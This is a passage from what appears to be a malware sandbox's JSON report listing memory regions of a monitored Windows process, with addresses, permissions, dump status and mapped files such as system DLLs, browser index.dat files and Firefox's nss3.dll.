"version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1498", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4788223, "entry_point": 0, "filename": null, "id": "region_1499", "name": "pagefile_0x0000000000390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3735552, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_1500", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001501-addr_0x00000000004d0000-size_0x000000000013b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1290240, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6336511, "entry_point": 0, "filename": null, "id": "region_1501", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:10.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 15728640, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1502", "name": "pagefile_0x0000000000f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15728640, "timestamp": "00:01:10.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001503-addr_0x0000000000610000-size_0x000000000013d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1298432, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7655423, "entry_point": 0, "filename": null, "id": "region_1503", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:10.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2600960, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 10268671, "entry_point": 0, "filename": null, "id": "region_1504", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:10.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 6881279, "entry_point": 0, "filename": null, "id": "region_1505", "name": "private_0x0000000000650000", "norm_filename": null, "region_type": "private_memory", "start_va": 6619136, "timestamp": "00:01:11.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1506", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:11.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2007039, "entry_point": 0, "filename": null, "id": "region_1729", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:46.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 172032, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5218303, "entry_point": 0, "filename": null, "id": "region_1730", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_1731", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_1732", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2052096, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 12341247, "entry_point": 0, "filename": null, "id": "region_1733", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2052096, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 14438399, "entry_point": 0, "filename": null, "id": "region_1734", "name": "private_0x0000000000bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12386304, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 10240000, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 38551551, "entry_point": 0, "filename": null, "id": "region_1735", "name": "pagefile_0x0000000001b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28311552, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1736", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1737", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1738", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:46.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1739", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:46.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1740", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:46.868", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001741-addr_0x00000000024d0000-size_0x00000000001f5000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2052096, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 40652799, "entry_point": 0, "filename": null, "id": "region_1741", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:46.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 6275071, "entry_point": 5898240, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1742", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 5898240, "timestamp": "00:01:46.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1744", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:01:46.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1745", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:01:46.888", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001746-addr_0x0000000000690000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_1746", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:01:46.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 15396863, "entry_point": 0, "filename": null, "id": "region_1747", "name": "pagefile_0x0000000000dd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14483456, "timestamp": "00:01:46.890", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1748", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1749", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1750", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_1751", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:01:46.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11010048, "start_va": 1831272448, "type": "region", "version": 1 }, "end_va": 1842282495, "entry_point": 1831272448, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1752", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 1831272448, "timestamp": "00:01:46.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1753", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:01:46.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1919811584, "type": "region", "version": 1 }, "end_va": 1920057343, "entry_point": 1919811584, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1754", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1919811584, "timestamp": "00:01:46.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1755", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:46.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1756", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:46.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1969291264, "type": "region", "version": 1 }, "end_va": 1971367935, "entry_point": 1969291264, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1757", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1969291264, "timestamp": "00:01:46.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 4849664, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1758", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 4849664, "timestamp": "00:01:46.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4923391, "entry_point": 0, "filename": null, "id": "region_1759", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:01:46.903", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1760", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:46.903", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 5505024, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1761", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 5505024, "timestamp": "00:01:46.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5578751, "entry_point": 0, "filename": null, "id": "region_1762", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:46.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 43642879, "entry_point": 40697856, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1763", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 40697856, "timestamp": "00:01:46.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1764", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:01:46.908", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1908015104, "type": "region", "version": 1 }, "end_va": 1908203519, "entry_point": 1908015104, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_1765", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 1908015104, "timestamp": "00:01:46.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985765375, "entry_point": 1984495616, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1766", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:46.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1993277440, "type": "region", "version": 1 }, "end_va": 1994280959, "entry_point": 1993277440, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1767", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1993277440, "timestamp": "00:01:46.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1768", "name": "pagefile_0x0000000000540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5505024, "timestamp": "00:01:46.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1769", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:01:46.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 5963775, "entry_point": 5898240, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1770", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 5898240, "timestamp": "00:01:46.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 5996543, "entry_point": 5963776, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1771", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 5963776, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6078463, "entry_point": 6029312, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1772", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 6029312, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1773", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1774", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:01:46.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6127615, "entry_point": 6094848, "filename": "\\Windows\\System32\\en-US\\urlmon.dll.mui", "id": "region_1775", "name": "urlmon.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\urlmon.dll.mui", "region_type": "memory_mapped_file", "start_va": 6094848, "timestamp": "00:01:46.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6422527, "entry_point": 6160384, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_1776", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 6160384, "timestamp": "00:01:46.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 44695551, "entry_point": 0, "filename": null, "id": "region_1777", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:01:46.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1912602624, "type": "region", "version": 1 }, "end_va": 1914392575, "entry_point": 1912602624, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1778", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1912602624, "timestamp": "00:01:47.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 